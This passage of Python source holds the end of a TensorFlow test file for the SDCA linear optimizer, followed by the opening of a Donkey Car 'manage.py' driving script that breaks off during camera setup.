make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
examples = make_example_dict(example_protos, example_weights)
example_ids = array_ops.placeholder(
dtypes.string, shape=(len(example_weights),))
examples['example_ids'] = example_ids
variables = make_variable_dict(1, 1)
for num_shards in _SHARD_NUMBERS:
for num_loss_partitions in _NUM_LOSS_PARTITIONS:
with self._single_threaded_test_session():
options = dict(
# Keep the same solution as for testSimple: since the number of
# examples is multiplied by num_loss_partitions, multiply the
# L2 regularization by the same value.
symmetric_l2_regularization=num_loss_partitions,
symmetric_l1_regularization=0,
loss_type='logistic_loss',
num_table_shards=num_shards,
num_loss_partitions=num_loss_partitions)
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
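# Each worker trains on its own shard: the example ids are offset by
# worker_id, so no two workers update the dual variable of the same
# example concurrently.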
def minimize(worker_id):
with self._single_threaded_test_session():
feed_dict = {example_ids: [
str(i + worker_id*len(example_weights)) for i in range(
len(example_weights))]}
for _ in range(_MAX_ITERATIONS):
train_op.run(feed_dict=feed_dict) # pylint: disable=cell-var-from-loop
threads = []
for worker_id in range(num_loss_partitions):
threads.append(threading.Thread(target=minimize, args=(worker_id,)))
threads[-1].start()
for t in threads:
t.join()
lr.update_weights(train_op).run(feed_dict={
example_ids: [str(i) for i in range(len(example_weights))]})
# Test only the unregularized loss because the optimal value of the
# regularized loss depends on num_loss_partitions.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.02)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertNear(0.0, lr.approximate_duality_gap().eval(), 0.02)
def testSimpleNoL2(self):
# Same as test above (so comments from above apply) but without an L2.
# The algorithm should behave as if we have an L2 of 1 in optimization but
# 0 in regularized_loss.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=0,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There is neither L1 nor L2 loss, so regularized and unregularized
# losses should be exactly the same.
self.assertAllClose(0.40244, unregularized_loss.eval(), atol=0.01)
self.assertAllClose(0.40244, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSomeUnweightedExamples(self):
# Setup test data with 4 examples, but should produce the same
# results as testSimple.
example_protos = [
# Will be used.
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 0),
# Will be used.
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 1),
]
example_weights = [1.0, 0.0, 1.0, 0.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
# Only use examples 0 and 2
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllClose([0, 1, 1, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testFractionalExampleLabel(self):
# Setup test data with one mostly-negative (0.1) and one mostly-positive (0.9) example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0.1),
make_example_proto({
'age': [1],
'gender': [1]
}, 0.9),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
with self.assertRaisesOpError(
'Only labels of 0.0 or 1.0 are supported right now.'):
lr.minimize().run()
def testImbalanced(self):
# Setup test data with 1 positive, and 3 negative examples.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [2],
'gender': [0]
}, 0),
make_example_proto({
'age': [3],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(3, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(
0.226487 + 0.102902, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.328394 + 0.131364, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0, 0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testImbalancedWithExampleWeights(self):
# Setup test data with 1 positive, and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [3.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.284860, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.408044, loss.eval(), atol=0.012)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testInstancesOfOneClassOnly(self):
# Setup test data with 1 positive (ignored), and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [0]
}, 1), # Shares gender with the instance above.
]
example_weights = [1.0, 0.0] # Second example "omitted" from training.
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testOutOfRangeSparseFeatures(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(0, 0)
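# The variables are sized for a maximum feature index of 0, but the second
# example uses index 1, so minimize() must fail with an out-of-range
# (invalid indices) error.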
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'indices.*'):
train_op.run()
def testOutOfRangeDenseFeatures(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[1.0, 0.0])
# Replace with a variable of size 1 instead of 2.
variables['dense_features_weights'] = [
variables_lib.Variable(array_ops.zeros(
[1], dtype=dtypes.float32))
]
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
'More dense features than we have parameters for.*'):
train_op.run()
# TODO(katsiaspis): add a test for the case when examples at the end of an
# epoch are repeated, since example id may be duplicated.
class SdcaWithLinearLossTest(SdcaModelTest):
"""SDCA optimizer test class for linear (squared) loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 2/3 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2
self.assertAllClose(
[-20.0 / 3.0, 28.0 / 3.0], predictions.eval(), rtol=0.005)
# Approximate gap should be very close to 0.0. (In fact, because the gap
# is only approximate, it is likely that upon convergence the duality gap
# can have a tiny negative value).
self.assertAllClose(0.0, lr.approximate_duality_gap().eval(), atol=1e-2)
def testL2Regularization(self):
# Setup test data
example_protos = [
# 2 identical examples
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
# 2 more identical examples
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=16,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 1/5 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 + L2 * 16 * weight^2
optimal1 = -10.0 / 5.0
optimal2 = 14.0 / 5.0
self.assertAllClose(
[optimal1, optimal1, optimal2, optimal2],
predictions.eval(),
rtol=0.01)
def testL1Regularization(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=4.0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
prediction = lr.predictions(examples)
loss = lr.regularized_loss(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be -4.0 and 20/3, from minimizing the per-example
# regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * weight^2 + 2 * L1 * |weight|
self.assertAllClose([-4.0, 20.0 / 3.0], prediction.eval(), rtol=0.08)
# Loss should be the sum of the regularized loss value from above per
# example after plugging in the optimal weights.
self.assertAllClose(308.0 / 6.0, loss.eval(), atol=0.01)
def testFeatureValues(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0, -2.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0, 2.0),
]
example_weights = [5.0, 3.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There are 4 (sparse) variable weights to be learned. 2 for age and 2 for
# gender. Let w_1, w_2 be age weights, w_3, w_4 be gender weights, y_1,
# y_2 be the labels for examples 1 and 2 respectively and s_1, s_2 the
# corresponding *example* weights. With the given feature values, the loss
# function is given by:
# s_1/2(y_1 + 2w_1 + 2w_3)^2 + s_2/2(y_2 - 2w_2 - 2w_4)^2
# + \lambda/2 (w_1^2 + w_2^2 + w_3^2 + w_4^2). Solving for the optimal, it
# can be verified that:
# w_1* = w_3* = -2.0 s_1 y_1/(\lambda + 8 s_1) and
# w_2* = w_4* = 2 \cdot s_2 y_2/(\lambda + 8 s_2). Equivalently, due to
# regularization and example weights, each prediction equals
# 8 \cdot s_i /(\lambda + 8 \cdot s_i) times its label.
self.assertAllClose(
[-10 * 40.0 / 41.0, 14.0 * 24 / 25.0], predictions.eval(), atol=0.01)
def testDenseFeaturesWithDefaultWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [0.0]], [0.0, 1.0]],
weights=[1.0, 1.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2(label_1-w_1)^2 + 1/2(label_2-w_2)^2 + \lambda/2 (w_1^2 + w_2^2). So,
# differentiating wrt to w_1, w_2 yields the following optimal values:
# w_1* = label_1/(\lambda + 1)= 10/2, w_2* =label_2/(\lambda + 1)= -5/2.
# In this case the (unnormalized regularized) loss will be:
# 1/2(10-5)^2 + 1/2(5-5/2)^2 + 1/2(5^2 + (5/2)^2) = 125.0/4. The actual
# loss should be further normalized by the sum of example weights.
self.assertAllClose([5.0, -2.5], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(125.0 / 8.0, loss.eval(), atol=0.01)
def testDenseFeaturesWithArbitraryWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=5.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2 s_1 (label_1-w_1)^2 + 1/2 s_2(label_2-w_2)^2 +
# \lambda/2 (w_1^2 + w_2^2) where s_1, s_2 are the *example weights. It
# turns out that the optimal (variable) weights are given by:
# w_1* = label_1 \cdot s_1/(\lambda + s_1)= 8.0 and
# w_2* =label_2 \cdot s_2/(\lambda + s_2)= -10/3.
# In this case the (unnormalized regularized) loss will be:
# s_1/2(8-10)^2 + s_2/2(5-10/3)^2 + 5.0/2(8^2 + (10/3)^2) = 2175.0/9. The
# actual loss should be further normalized by the sum of example weights.
self.assertAllClose([8.0, -10.0 / 3], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(2175.0 / 270.0, loss.eval(), atol=0.01)
class SdcaWithHingeLossTest(SdcaModelTest):
"""SDCA optimizer test class for hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model perfectly separates the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). Solving the system w1 + w3 = 1.0, w2 + w4 = -1.0 and minimizing
# wrt to \|\vec{w}\|_2, gives w1=w3=1/2 and w2=w4=-1/2. This gives 0.0
# unregularized loss and 0.25 L2 loss.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllEqual([-1.0, 1.0], predictions.eval())
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.0, unregularized_loss.eval())
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.05)
def testDenseFeaturesPerfectlySeparable(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[1.0, 1.0], [1.0, -1.0]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([1.0, -1.0], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
# (1.0, 1.0) and (1.0, -1.0) are perfectly separable by x-axis (that is,
# the SVM's functional margin >=1), so the unregularized loss is ~0.0.
# There is only loss due to l2-regularization. For these datapoints, it
# turns out that w_1~=0.0 and w_2~=1.0 which means that l2 loss is ~0.25.
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.0, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesSeparableWithinMargins(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.5], [1.0, -0.5]]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# (1.0, 0.5) and (1.0, -0.5) are separable by x-axis but the datapoints
# are within the margins so there is unregularized loss (1/2 per example).
# For these datapoints, optimal weights are w_1~=0.0 and w_2~=1.0 which
# gives an L2 loss of ~0.25.
self.assertAllClose([0.5, -0.5], predictions.eval(), rtol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.5, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.75, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesWeightedExamples(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [1.0]], [[0.5], [-0.5]]],
weights=[3.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# Point (1.0, 0.5) has higher weight than (1.0, -0.5) so the model will
# try to increase the margin from (1.0, 0.5). Due to regularization,
# (1.0, -0.5) will be within the margin. For these points and example
# weights, the optimal weights are w_1~=0.4 and w_2~=1.2, which give an L2
# loss of 0.5 * (0.4^2 + 1.2^2) / 4 = 0.2 (normalized by the sum of the
# example weights). The binary predictions will be
# correct, but the boundary will be much closer to the 2nd point than the
# first one.
self.assertAllClose([1.0, -0.2], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.2, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.4, regularized_loss.eval(), atol=0.02)
class SdcaWithSmoothHingeLossTest(SdcaModelTest):
"""SDCA optimizer test class for smooth hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='smooth_hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model perfectly separates the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). The minimization leads to w1=w3=1/3 and w2=w4=-1/3. This gives
# an unregularized hinge loss of 0.33 and a 0.11 L2 loss
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllClose([-0.67, 0.67], predictions.eval(), atol=0.05)
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.33, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.44, regularized_loss.eval(), atol=0.02)
class SdcaFprintTest(SdcaModelTest):
"""Tests for the SdcaFprint op.
This is one way of enforcing the platform-agnostic nature of SdcaFprint.
Basically we check against exact values, and this test can be run across
different platforms. Note that it is fine for the expected values to change
in the future if the implementation of SdcaFprint changes (i.e. this is *not* a
frozen test).
"""
def testFprint(self):
with self._single_threaded_test_session():
in_data = constant_op.constant(['abc', 'very looooooong string', 'def'])
out_data = gen_sdca_ops.sdca_fprint(in_data)
self.assertAllEqual([[4143508125394299908, -6879828354153669051],
[5849691694103072671, -4874542629849009556],
[603227410218889250, 8762207001949257490]],
out_data.eval())
if __name__ == '__main__':
googletest.main()
|
manage.py
|
#!/usr/bin/env python3
"""
Scripts to drive a donkey 2 car
Usage:
manage.py (drive) [--model=<model>] [--js] [--type=(linear|categorical)] [--camera=(single|stereo)] [--meta=<key:value> ...] [--myconfig=<filename>]
manage.py (train) [--tubs=tubs] (--model=<model>) [--type=(linear|inferred|tensorrt_linear|tflite_linear)]
Options:
-h --help Show this screen.
--js Use physical joystick.
-f --file=<file> A text file containing paths to tub files, one per line. Option may be used more than once.
--meta=<key:value> Key/Value strings describing a piece of meta data about this drive. Option may be used more than once.
--myconfig=filename Specify myconfig file to use.
[default: myconfig.py]
"""
import os
import time
import logging
from docopt import docopt
import numpy as np
import donkeycar as dk
from donkeycar.parts.transform import TriggeredCallback, DelayedTrigger
from donkeycar.parts.tub_v2 import TubWriter
from donkeycar.parts.datastore import TubHandler
from donkeycar.parts.controller import LocalWebController, JoystickController, WebFpv
from donkeycar.parts.throttle_filter import ThrottleFilter
from donkeycar.parts.behavior import BehaviorPart
from donkeycar.parts.file_watcher import FileWatcher
from donkeycar.parts.launch import AiLaunch
from donkeycar.utils import *
from donkeypart_sombrero import Sombrero as Smbrero
logger = logging.getLogger()
def drive(cfg, model_path=None, use_joystick=False, model_type=None, camera_type='single', meta=[]):
'''
Construct a working robotic vehicle from many parts.
Each part runs as a job in the Vehicle loop, calling either
its run or run_threaded method depending on the constructor flag `threaded`.
All parts are updated one after another at the framerate given in
cfg.DRIVE_LOOP_HZ assuming each part finishes processing in a timely manner.
Parts may have named outputs and inputs. The framework handles passing named outputs
to parts requesting the same named input.
'''
if cfg.DONKEY_GYM:
#the simulator will use cuda, and we usually run out of resources
#if we also try to use cuda, so disable it for donkey_gym.
os.environ["CUDA_VISIBLE_DEVICES"]="-1"
if model_type is None:
if cfg.TRAIN_LOCALIZER:
model_type = "localizer"
elif cfg.TRAIN_BEHAVIORS:
model_type = "behavior"
else:
model_type = cfg.DEFAULT_MODEL_TYPE
#Initialize car
V = dk.vehicle.Vehicle()
# sombrero = Smbrero(
# steering_channel=cfg.STEERING_CHANNEL,
# steering_left_pwm=cfg.STEERING_LEFT_PWM,
# steering_right_pwm=cfg.STEERING_RIGHT_PWM,
# throttle_channel=cfg.THROTTLE_CHANNEL,
# throttle_forward_pwm=cfg.THROTTLE_FORWARD_PWM,
# throttle_stop_pwm=cfg.THROTTLE_STOPPED_PWM,
# throttle_reverse_pwm=cfg.THROTTLE_REVERSE_PWM
# )
# V.add(sombrero, inputs=['angle', 'throttle'])
#Initialize logging before anything else to allow console logging
if cfg.HAVE_CONSOLE_LOGGING:
logger.setLevel(logging.getLevelName(cfg.LOGGING_LEVEL))
ch = logging.StreamHandler()
ch.setFormatter(logging.Formatter(cfg.LOGGING_FORMAT))
logger.addHandler(ch)
logger.info("cfg.CAMERA_TYPE %s"%cfg.CAMERA_TYPE)
if camera_type == "stereo":
if cfg.CAMERA_TYPE == "WEBCAM":
from donkeycar.parts.camera import Webcam
camA = Webcam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, iCam = 0)
camB = Webcam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, iCam = 1)
elif cfg.CAMERA_TYPE == "CVCAM":
from donkeycar.parts.cv import CvCam
camA = CvCam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, iCam = 0)
camB = CvCam(image_w=cfg.IMAGE_W, image_h=cfg.IMAGE_H, image_d=cfg.IMAGE_DEPTH, iCam = 1)
else:
raise(Exception("Unsupported camera type: %s" % cfg.CAMERA_TYPE))
V.add(camA, outputs=['cam/image_array_a'], threaded=True)
V.add(camB, outputs=['cam/image_array_b'], threaded=True)
from donkeycar.parts.image import StereoPair
V.add(StereoPair(), inputs=['cam/image_array_a', 'cam/image_array_b'],
outputs=['cam/image_array'])
elif cfg.CAMERA_TYPE == "D435":
from donkeycar.parts.realsense435i import RealSense435i
cam = RealSense435i(
enable_rgb=cfg.REALSENSE_D435_RGB,
enable_depth=cfg.REALSENSE_D435_DEPTH,
enable_imu=cfg.REALSENSE_D435_IMU,
device_id=cfg.REALSENSE_D435_ID)
V.add(cam, inputs=[],
outputs=['cam/image_array', 'cam/depth_array',
'imu/acl_x', 'imu/acl_y', 'imu/acl_z',
'imu/gyr_x', 'imu/gyr_y', 'imu/gyr_z'],
threaded=True)
else:
inputs = []
